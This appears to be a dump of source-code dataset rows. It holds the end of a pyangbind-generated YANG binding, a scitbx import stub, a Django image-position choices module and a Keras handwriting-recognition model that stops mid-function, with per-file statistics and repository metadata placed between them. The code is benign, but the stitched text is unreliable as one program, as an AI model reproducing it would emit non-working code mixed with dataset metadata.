  self.__supportable_nominal_central_frequency_range = YANGDynClass(base=yc_supportable_nominal_central_frequency_range_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_nominal_central_frequency_range, is_container='container', yang_name="supportable-nominal-central-frequency-range", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=False)
def _get_supportable_bandwidth(self):
  """
  Getter method for supportable_bandwidth, mapped from YANG variable /DRoF_TP_capability/supportable_bandwidth (string)

  YANG Description: e.g. 25GHz
  """
  return self.__supportable_bandwidth

def _set_supportable_bandwidth(self, v, load=False):
  """
  Setter method for supportable_bandwidth, mapped from YANG variable /DRoF_TP_capability/supportable_bandwidth (string)
  If this variable is read-only (config: false) in the
  source YANG file, then _set_supportable_bandwidth is considered as a private
  method. Backends looking to populate this variable should
  do so via calling thisObj._set_supportable_bandwidth() directly.

  YANG Description: e.g. 25GHz
  """
  # Unwrap pyangbind union-typed wrappers to the underlying value first.
  if hasattr(v, "_utype"):
    v = v._utype(v)
  try:
    # Coerce the supplied value into the generated YANG 'string' leaf type.
    t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="supportable-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
  except (TypeError, ValueError):
    raise ValueError({
      'error-string': """supportable_bandwidth must be of a type compatible with string""",
      'defined-type': "string",
      'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)""",
    })
  self.__supportable_bandwidth = t
  # Notify the parent hierarchy (if the hook exists) that a child changed.
  if hasattr(self, '_set'):
    self._set()

def _unset_supportable_bandwidth(self):
  # Reset the leaf to a fresh default (unset) instance.
  self.__supportable_bandwidth = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="supportable-bandwidth", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='string', is_config=False)
def _get_supportable_FEC(self):
  """
  Getter method for supportable_FEC, mapped from YANG variable /DRoF_TP_capability/supportable_FEC (list)
  """
  return self.__supportable_FEC

def _set_supportable_FEC(self, v, load=False):
  """
  Setter method for supportable_FEC, mapped from YANG variable /DRoF_TP_capability/supportable_FEC (list)
  If this variable is read-only (config: false) in the
  source YANG file, then _set_supportable_FEC is considered as a private
  method. Backends looking to populate this variable should
  do so via calling thisObj._set_supportable_FEC() directly.
  """
  # Unwrap pyangbind union-typed wrappers to the underlying value first.
  if hasattr(v, "_utype"):
    v = v._utype(v)
  try:
    # YANG list keyed on 'fec-id'; entries are the generated container class.
    t = YANGDynClass(v,base=YANGListType("fec_id",yc_supportable_FEC_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_FEC, yang_name="supportable-FEC", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-id', extensions=None), is_container='list', yang_name="supportable-FEC", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
  except (TypeError, ValueError):
    raise ValueError({
      'error-string': """supportable_FEC must be of a type compatible with list""",
      'defined-type': "list",
      'generated-type': """YANGDynClass(base=YANGListType("fec_id",yc_supportable_FEC_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_FEC, yang_name="supportable-FEC", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-id', extensions=None), is_container='list', yang_name="supportable-FEC", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)""",
    })
  self.__supportable_FEC = t
  # Notify the parent hierarchy (if the hook exists) that a child changed.
  if hasattr(self, '_set'):
    self._set()

def _unset_supportable_FEC(self):
  # Reset the list to a fresh default (unset) instance.
  self.__supportable_FEC = YANGDynClass(base=YANGListType("fec_id",yc_supportable_FEC_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_FEC, yang_name="supportable-FEC", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='fec-id', extensions=None), is_container='list', yang_name="supportable-FEC", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
def _get_supportable_equalization(self):
  """
  Getter method for supportable_equalization, mapped from YANG variable /DRoF_TP_capability/supportable_equalization (list)
  """
  return self.__supportable_equalization

def _set_supportable_equalization(self, v, load=False):
  """
  Setter method for supportable_equalization, mapped from YANG variable /DRoF_TP_capability/supportable_equalization (list)
  If this variable is read-only (config: false) in the
  source YANG file, then _set_supportable_equalization is considered as a private
  method. Backends looking to populate this variable should
  do so via calling thisObj._set_supportable_equalization() directly.
  """
  # Unwrap pyangbind union-typed wrappers to the underlying value first.
  if hasattr(v, "_utype"):
    v = v._utype(v)
  try:
    # YANG list keyed on 'equalization-id'; entries are the generated container class.
    t = YANGDynClass(v,base=YANGListType("equalization_id",yc_supportable_equalization_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_equalization, yang_name="supportable-equalization", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='equalization-id', extensions=None), is_container='list', yang_name="supportable-equalization", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
  except (TypeError, ValueError):
    raise ValueError({
      'error-string': """supportable_equalization must be of a type compatible with list""",
      'defined-type': "list",
      'generated-type': """YANGDynClass(base=YANGListType("equalization_id",yc_supportable_equalization_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_equalization, yang_name="supportable-equalization", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='equalization-id', extensions=None), is_container='list', yang_name="supportable-equalization", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)""",
    })
  self.__supportable_equalization = t
  # Notify the parent hierarchy (if the hook exists) that a child changed.
  if hasattr(self, '_set'):
    self._set()

def _unset_supportable_equalization(self):
  # Reset the list to a fresh default (unset) instance.
  self.__supportable_equalization = YANGDynClass(base=YANGListType("equalization_id",yc_supportable_equalization_blueSPACE_DRoF_TP_capability__DRoF_TP_capability_supportable_equalization, yang_name="supportable-equalization", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='equalization-id', extensions=None), is_container='list', yang_name="supportable-equalization", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='list', is_config=False)
# Read-only public properties: every node here is state data (config: false),
# so no setter is registered with the property objects.
supportable_capacity = __builtin__.property(_get_supportable_capacity)
supportable_modulation = __builtin__.property(_get_supportable_modulation)
supportable_subcarriers = __builtin__.property(_get_supportable_subcarriers)
supportable_constellation = __builtin__.property(_get_supportable_constellation)
supportable_nominal_central_frequency_range = __builtin__.property(_get_supportable_nominal_central_frequency_range)
supportable_bandwidth = __builtin__.property(_get_supportable_bandwidth)
supportable_FEC = __builtin__.property(_get_supportable_FEC)
supportable_equalization = __builtin__.property(_get_supportable_equalization)

# Ordered registry of child elements, in YANG-module order; pyangbind uses it
# for (de)serialisation and attribute discovery.
_pyangbind_elements = OrderedDict([('supportable_capacity', supportable_capacity), ('supportable_modulation', supportable_modulation), ('supportable_subcarriers', supportable_subcarriers), ('supportable_constellation', supportable_constellation), ('supportable_nominal_central_frequency_range', supportable_nominal_central_frequency_range), ('supportable_bandwidth', supportable_bandwidth), ('supportable_FEC', supportable_FEC), ('supportable_equalization', supportable_equalization), ])
class blueSPACE_DRoF_TP_capability(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module blueSPACE-DRoF-TP-capability - based on the path /blueSPACE-DRoF-TP-capability. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.

  YANG Description: Latest update to blueSPACE-DRoF-TP-capability YANG data model.
  """
  # __slots__ keeps instances lightweight; the mangled slot name backs the
  # DRoF_TP_capability container below.
  __slots__ = ('_path_helper', '_extmethods', '__DRoF_TP_capability',)

  _yang_name = 'blueSPACE-DRoF-TP-capability'
  _pybind_generated_by = 'container'

  def __init__(self, *args, **kwargs):
    # Path helper / extension methods are disabled by default for the root.
    self._path_helper = False
    self._extmethods = False
    # Root container instance, backed by its generated pyangbind class.
    self.__DRoF_TP_capability = YANGDynClass(base=yc_DRoF_TP_capability_blueSPACE_DRoF_TP_capability__DRoF_TP_capability, is_container='container', yang_name="DRoF-TP-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=True)

    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      # Copy-constructor path: the single argument must expose every element
      # this container defines; changed elements are copied via the setters.
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue  # only copy elements the source object actually set
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)

  def _path(self):
    # Path of this node: parent's path plus our YANG name; root returns [].
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return []

  def _get_DRoF_TP_capability(self):
    """
    Getter method for DRoF_TP_capability, mapped from YANG variable /DRoF_TP_capability (container)
    """
    return self.__DRoF_TP_capability

  def _set_DRoF_TP_capability(self, v, load=False):
    """
    Setter method for DRoF_TP_capability, mapped from YANG variable /DRoF_TP_capability (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_DRoF_TP_capability is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_DRoF_TP_capability() directly.
    """
    # Unwrap pyangbind union-typed wrappers to the underlying value first.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=yc_DRoF_TP_capability_blueSPACE_DRoF_TP_capability__DRoF_TP_capability, is_container='container', yang_name="DRoF-TP-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
        'error-string': """DRoF_TP_capability must be of a type compatible with container""",
        'defined-type': "container",
        'generated-type': """YANGDynClass(base=yc_DRoF_TP_capability_blueSPACE_DRoF_TP_capability__DRoF_TP_capability, is_container='container', yang_name="DRoF-TP-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=True)""",
      })
    self.__DRoF_TP_capability = t
    # Notify the parent hierarchy (if the hook exists) that a child changed.
    if hasattr(self, '_set'):
      self._set()

  def _unset_DRoF_TP_capability(self):
    # Reset the container to a fresh default (unset) instance.
    self.__DRoF_TP_capability = YANGDynClass(base=yc_DRoF_TP_capability_blueSPACE_DRoF_TP_capability__DRoF_TP_capability, is_container='container', yang_name="DRoF-TP-capability", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:blueSPACE-DRoF-TP-capability', defining_module='blueSPACE-DRoF-TP-capability', yang_type='container', is_config=True)

  # config: true container, so the property exposes both getter and setter.
  DRoF_TP_capability = __builtin__.property(_get_DRoF_TP_capability, _set_DRoF_TP_capability)

  _pyangbind_elements = OrderedDict([('DRoF_TP_capability', DRoF_TP_capability), ])
| 73.308557
| 2,306
| 0.752576
| 10,890
| 84,818
| 5.587971
| 0.021579
| 0.055609
| 0.148292
| 0.185693
| 0.932444
| 0.915945
| 0.906102
| 0.901829
| 0.889685
| 0.888173
| 0
| 0.005396
| 0.119538
| 84,818
| 1,156
| 2,307
| 73.371972
| 0.809465
| 0.154083
| 0
| 0.64464
| 0
| 0.030837
| 0.410276
| 0.267487
| 0
| 0
| 0
| 0
| 0
| 1
| 0.113069
| false
| 0
| 0.022026
| 0
| 0.268722
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ad2bdd3e49c9933b56d53ff5038f652e0861a31a
| 158
|
py
|
Python
|
scitbx/linalg/eigensystem.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
scitbx/linalg/eigensystem.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
scitbx/linalg/eigensystem.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
from scitbx.linalg.ext import eigensystem_real_symmetric as real_symmetric # implicit import
| 52.666667
| 92
| 0.873418
| 21
| 158
| 6.142857
| 0.714286
| 0.20155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094937
| 158
| 2
| 93
| 79
| 0.902098
| 0.094937
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
ad37eac67576e8f3a86df4a9ca2baf122f10a377
| 181
|
py
|
Python
|
glitter/blocks/text_image/choices.py
|
dhamaniasad/django-glitter
|
b9b0a3d8b49d5d9b840656f84564ba0a6e016f98
|
[
"BSD-3-Clause"
] | 3
|
2017-06-01T16:22:18.000Z
|
2018-08-22T21:45:55.000Z
|
glitter/blocks/text_image/choices.py
|
blancltd/django-glitter
|
b9b0a3d8b49d5d9b840656f84564ba0a6e016f98
|
[
"BSD-3-Clause"
] | 85
|
2016-02-25T10:34:03.000Z
|
2017-04-03T11:07:59.000Z
|
glitter/blocks/text_image/choices.py
|
dhamaniasad/django-glitter
|
b9b0a3d8b49d5d9b840656f84564ba0a6e016f98
|
[
"BSD-3-Clause"
] | 1
|
2020-04-21T19:14:11.000Z
|
2020-04-21T19:14:11.000Z
|
# Image-placement options for the text/image block.
POSITION_IMAGE_LEFT = 'image-left'
POSITION_IMAGE_RIGHT = 'image-right'

# (stored value, human-readable label) pairs, in Django "choices" format.
POSITION_CHOICES = (
    (POSITION_IMAGE_LEFT, 'Image Left'),
    (POSITION_IMAGE_RIGHT, 'Image Right'),
)
| 20.111111
| 42
| 0.729282
| 22
| 181
| 5.590909
| 0.227273
| 0.422764
| 0.276423
| 0.357724
| 0.878049
| 0.878049
| 0.878049
| 0.878049
| 0.878049
| 0.878049
| 0
| 0
| 0.143646
| 181
| 8
| 43
| 22.625
| 0.793548
| 0
| 0
| 0
| 0
| 0
| 0.232044
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
ad6dce0fb3c75baa10b6fe8f090a39a948fb91ba
| 11,428
|
py
|
Python
|
Models/HTR_Models.py
|
terng03412/ResFlor
|
721ba62040ce35c73f5a6b4105818f8d8a3d0312
|
[
"MIT"
] | 2
|
2020-12-18T04:00:50.000Z
|
2021-11-14T14:03:33.000Z
|
Models/HTR_Models.py
|
terng03412/ResFlor
|
721ba62040ce35c73f5a6b4105818f8d8a3d0312
|
[
"MIT"
] | null | null | null |
Models/HTR_Models.py
|
terng03412/ResFlor
|
721ba62040ce35c73f5a6b4105818f8d8a3d0312
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
import numpy as np
import cv2
import string
import h5py
keras = tf.keras
print(tf.__version__)
class FullGatedConv2D(keras.layers.Conv2D):
    """Gated Convolutional Class

    A Conv2D that produces 2*filters feature maps and splits them into a
    linear half and a sigmoid gate half, returning their elementwise
    product, so the layer's effective output depth is `filters`.
    """

    def __init__(self, filters, **kwargs):
        # Build the underlying convolution with twice the requested filters:
        # the first half feeds the linear path, the second half the gate.
        super(FullGatedConv2D, self).__init__(filters=filters * 2, **kwargs)
        self.nb_filters = filters

    def call(self, inputs):
        """Apply gated convolution"""
        output = super(FullGatedConv2D, self).call(inputs)
        # Split along the channel axis: [:nb_filters] linear, [nb_filters:] gate.
        linear = keras.layers.Activation("linear")(
            output[:, :, :, :self.nb_filters])
        sigmoid = keras.layers.Activation("sigmoid")(
            output[:, :, :, self.nb_filters:])
        return keras.layers.Multiply()([linear, sigmoid])

    def compute_output_shape(self, input_shape):
        """Compute shape of layer output"""
        output_shape = super(
            FullGatedConv2D, self).compute_output_shape(input_shape)
        # Report the gated depth (nb_filters), not the doubled Conv2D depth.
        return tuple(output_shape[:3]) + (self.nb_filters,)

    def get_config(self):
        """Return the config of the layer"""
        config = super(FullGatedConv2D, self).get_config()
        # Serialize the logical filter count and drop the doubled 'filters'
        # so that from_config() re-doubles it exactly once in __init__.
        config['nb_filters'] = self.nb_filters
        del config['filters']
        return config
def FlorHTR(input_shape, output_shape):
    """Build the Flor handwritten-text-recognition network.

    Returns the (input_tensor, output_tensor) pair of a gated-CNN encoder
    followed by a bidirectional-GRU sequence decoder; the caller wraps them
    in a keras Model (output units = output_shape, softmax over classes).
    """
    input_data = keras.layers.Input(name="input", shape=input_shape)

    # Conv stage 1: 16 filters, spatial downsampling by (2, 2).
    cnn = keras.layers.Conv2D(filters=16, kernel_size=(3, 3), strides=(2, 2), padding="same", kernel_initializer="he_uniform")(input_data)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=16, kernel_size=(3, 3), padding="same")(cnn)

    # Conv stage 2: 32 filters, no downsampling.
    cnn = keras.layers.Conv2D(filters=32, kernel_size=(3, 3), strides=(1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=32, kernel_size=(3, 3), padding="same")(cnn)

    # Conv stage 3: 40 filters, asymmetric (2, 4) downsampling; gated conv
    # constrained by MaxNorm and followed by dropout.
    cnn = keras.layers.Conv2D(filters=40, kernel_size=(2, 4), strides=(2, 4), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=40, kernel_size=(3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
    cnn = keras.layers.Dropout(rate=0.2)(cnn)

    # Conv stage 4: 48 filters.
    cnn = keras.layers.Conv2D(filters=48, kernel_size=(3, 3), strides=(1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=48, kernel_size=(3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
    cnn = keras.layers.Dropout(rate=0.2)(cnn)

    # Conv stage 5: 56 filters, second (2, 4) downsampling.
    cnn = keras.layers.Conv2D(filters=56, kernel_size=(2, 4), strides=(2, 4), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=56, kernel_size=(3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
    cnn = keras.layers.Dropout(rate=0.2)(cnn)

    # Conv stage 6: 64 filters, then max-pool the remaining width axis.
    cnn = keras.layers.Conv2D(filters=64, kernel_size=(3, 3), strides=(1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = keras.layers.MaxPooling2D(pool_size=(1, 2), strides=(1, 2), padding="valid")(cnn)

    # Collapse the (height, channels) axes into features per time step, then
    # decode the sequence with two bidirectional GRUs.
    shape = cnn.get_shape()
    bgru = keras.layers.Reshape((shape[1], shape[2] * shape[3]))(cnn)

    bgru = keras.layers.Bidirectional(keras.layers.GRU(units=128, return_sequences=True, dropout=0.5))(bgru)
    bgru = keras.layers.TimeDistributed(keras.layers.Dense(units=128))(bgru)
    bgru = keras.layers.Bidirectional(keras.layers.GRU(units=128, return_sequences=True, dropout=0.5))(bgru)

    # Per-timestep class distribution (softmax over output_shape classes).
    output_data = keras.layers.TimeDistributed(
        keras.layers.Dense(units=output_shape, activation="softmax"))(bgru)

    return (input_data, output_data)
def ExtendFlorHTR(input_shape, output_shape):
    """Build an extended Flor HTR network.

    Same layout as FlorHTR, but stage 6 also gets a gated convolution with
    dropout, and a seventh 72-filter conv stage (with a further (2, 4)
    downsampling) is added before the recurrent decoder. Returns the
    (input_tensor, output_tensor) pair.
    """
    input_data = keras.layers.Input(name="input", shape=input_shape)

    # Conv stage 1: 16 filters, spatial downsampling by (2, 2).
    cnn = keras.layers.Conv2D(filters=16, kernel_size=(3, 3), strides=(2, 2), padding="same", kernel_initializer="he_uniform")(input_data)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=16, kernel_size=(3, 3), padding="same")(cnn)

    # Conv stage 2: 32 filters.
    cnn = keras.layers.Conv2D(filters=32, kernel_size=(3, 3), strides=(1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=32, kernel_size=(3, 3), padding="same")(cnn)

    # Conv stage 3: 40 filters, (2, 4) downsampling; MaxNorm-constrained gate.
    cnn = keras.layers.Conv2D(filters=40, kernel_size=(2, 4), strides=(2, 4), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=40, kernel_size=(3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
    cnn = keras.layers.Dropout(rate=0.2)(cnn)

    # Conv stage 4: 48 filters.
    cnn = keras.layers.Conv2D(filters=48, kernel_size=(3, 3), strides=(1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=48, kernel_size=(3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
    cnn = keras.layers.Dropout(rate=0.2)(cnn)

    # Conv stage 5: 56 filters, second (2, 4) downsampling.
    cnn = keras.layers.Conv2D(filters=56, kernel_size=(2, 4), strides=(2, 4), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=56, kernel_size=(3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
    cnn = keras.layers.Dropout(rate=0.2)(cnn)

    # Conv stage 6: 64 filters — unlike FlorHTR, also gated + dropout here.
    cnn = keras.layers.Conv2D(filters=64, kernel_size=(3, 3), strides=(1, 1), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)
    cnn = FullGatedConv2D(filters=64, kernel_size=(3, 3), padding="same", kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(cnn)
    cnn = keras.layers.Dropout(rate=0.2)(cnn)

    cnn = keras.layers.MaxPooling2D(pool_size=(1, 2), strides=(1, 2), padding="valid")(cnn)

    # Extra conv stage 7: 72 filters with a further (2, 4) downsampling.
    cnn = keras.layers.Conv2D(filters=72, kernel_size=(2, 4), strides=(2, 4), padding="same", kernel_initializer="he_uniform")(cnn)
    cnn = keras.layers.PReLU(shared_axes=[1, 2])(cnn)
    cnn = keras.layers.BatchNormalization(renorm=True)(cnn)

    # Collapse (height, channels) into per-timestep features, then decode
    # with two bidirectional GRUs as in FlorHTR.
    shape = cnn.get_shape()
    bgru = keras.layers.Reshape((shape[1], shape[2] * shape[3]))(cnn)

    bgru = keras.layers.Bidirectional(keras.layers.GRU(units=128, return_sequences=True, dropout=0.5))(bgru)
    bgru = keras.layers.TimeDistributed(keras.layers.Dense(units=128))(bgru)
    bgru = keras.layers.Bidirectional(keras.layers.GRU(units=128, return_sequences=True, dropout=0.5))(bgru)

    # Per-timestep class distribution (softmax over output_shape classes).
    output_data = keras.layers.TimeDistributed(
        keras.layers.Dense(units=output_shape, activation="softmax"))(bgru)

    return (input_data, output_data)
def FlorResAcHTR(input_shape, output_shape):
    """Build the gated residual CNN + BGRU graph (Flor-style HTR network).

    Residual connections follow https://arxiv.org/pdf/1512.03385.pdf

    :param input_shape: shape of the input image tensor (without batch dim)
    :param output_shape: size of the softmax output (charset size)
    :return: (input_tensor, output_tensor) pair for keras.Model construction
    """

    def _res_block(tensor, filters, kernel_size, strides, regularized):
        # Conv -> PReLU -> BatchNorm, then a gated conv whose output is
        # added back onto the normalized tensor (identity shortcut).
        tensor = keras.layers.Conv2D(
            filters=filters, kernel_size=kernel_size, strides=strides,
            padding="same", kernel_initializer="he_uniform")(tensor)
        tensor = keras.layers.PReLU(shared_axes=[1, 2])(tensor)
        shortcut = keras.layers.BatchNormalization(renorm=True)(tensor)
        if regularized:
            gated = FullGatedConv2D(
                filters=filters, kernel_size=(3, 3), padding="same",
                kernel_constraint=keras.constraints.MaxNorm(4, [0, 1, 2]))(shortcut)
            gated = keras.layers.Dropout(rate=0.2)(gated)
        else:
            gated = FullGatedConv2D(
                filters=filters, kernel_size=(3, 3), padding="same")(shortcut)
        merged = keras.layers.add([shortcut, gated])
        return keras.layers.PReLU(shared_axes=[1, 2])(merged)

    input_data = keras.layers.Input(name="input", shape=input_shape)

    # Five residual stages; the (2, 4) kernels/strides downsample width faster
    # than height. Later stages add MaxNorm + dropout regularization.
    x = _res_block(input_data, 16, (3, 3), (2, 2), regularized=False)
    x = _res_block(x, 32, (3, 3), (1, 1), regularized=False)
    x = _res_block(x, 40, (2, 4), (2, 4), regularized=True)
    x = _res_block(x, 48, (3, 3), (1, 1), regularized=True)
    x = _res_block(x, 56, (2, 4), (2, 4), regularized=True)

    # Final plain conv stage + pooling before the recurrent head.
    x = keras.layers.Conv2D(filters=64, kernel_size=(3, 3), strides=(1, 1),
                            padding="same", kernel_initializer="he_uniform")(x)
    x = keras.layers.PReLU(shared_axes=[1, 2])(x)
    x = keras.layers.BatchNormalization(renorm=True)(x)
    x = keras.layers.MaxPooling2D(pool_size=(1, 2), strides=(1, 2),
                                  padding="valid")(x)

    # Collapse the spatial map into a sequence and decode with stacked BGRUs.
    shape = x.get_shape()
    seq = keras.layers.Reshape((shape[1], shape[2] * shape[3]))(x)
    seq = keras.layers.Bidirectional(
        keras.layers.GRU(units=128, return_sequences=True, dropout=0.5))(seq)
